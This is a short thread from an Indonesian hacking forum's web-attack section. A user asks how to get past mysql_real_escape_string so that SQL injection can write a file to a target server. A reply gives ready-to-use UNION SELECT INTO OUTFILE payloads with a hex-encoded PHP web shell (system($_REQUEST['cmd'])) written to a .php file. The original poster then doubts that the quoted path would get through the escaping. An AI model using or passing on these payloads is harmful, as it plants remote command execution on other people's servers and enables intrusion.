Ask SQL Injection INTO OUTFILE bypass mysql_real_escape_string - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Web Attack (https://www.indonesianbacktrack.or.id/forum/forum-181.html) +--- Thread: Ask SQL Injection INTO OUTFILE bypass mysql_real_escape_string (/thread-6435.html) |
SQL Injection INTO OUTFILE bypass mysql_real_escape_string - dharaninja - 08-15-2015 Ane mau tanya nih bypass mysql_real_escape_string untuk outfile Pertama ane check user dulu sama file_privelege. Hasilnya root dan memiliki akses write file Nah, pas ane coba upload malah kayak gini. Pathnya ane hex karena kan karakter ' di filter Mohon pencerahannya brother, ane masih belajar. RE: SQL Injection INTO OUTFILE bypass mysql_real_escape_string - Guest - 09-13-2015 try dis ; ..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/here/lol.php'--+- or ; ..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/on/hex/here/lol.php'--+ RE: SQL Injection INTO OUTFILE bypass mysql_real_escape_string - dharaninja - 09-22-2015 (09-13-2015, 01:06 AM)Guest Wrote: try dis ; But, mysql_real_escape_string will addslash every single quotes. Example : INTO OUTFILE '/path' will become INTO OUTFILE \'/path\' . So, it wont work |